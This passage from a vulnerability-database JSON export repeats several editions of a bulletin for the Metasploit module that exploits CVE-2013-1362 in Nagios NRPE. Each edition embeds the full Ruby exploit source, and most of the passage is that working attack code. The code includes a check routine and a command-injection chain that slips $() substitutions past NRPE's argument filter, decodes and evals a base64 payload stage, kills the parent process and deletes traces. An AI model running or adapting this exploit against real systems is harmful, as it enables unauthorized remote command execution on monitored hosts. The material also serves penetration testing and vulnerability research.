},\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-15T08:01:40", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-15T10:05:47", "history": [], "viewCount": 19, "enchantments": {"score": {"value": null, "modified": "2018-01-15T10:05:47"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-15T10:05:47", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-18T00:03:52", "history": [], "viewCount": 19, "enchantments": {"score": {"value": null, "modified": "2018-01-18T00:03:52"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-18T00:03:52", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-18T02:02:28", "history": [], "viewCount": 58, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-18T02:02:28"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-18T02:02:28", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-26T14:07:32", "history": [], "viewCount": 58, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-26T14:07:32"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return 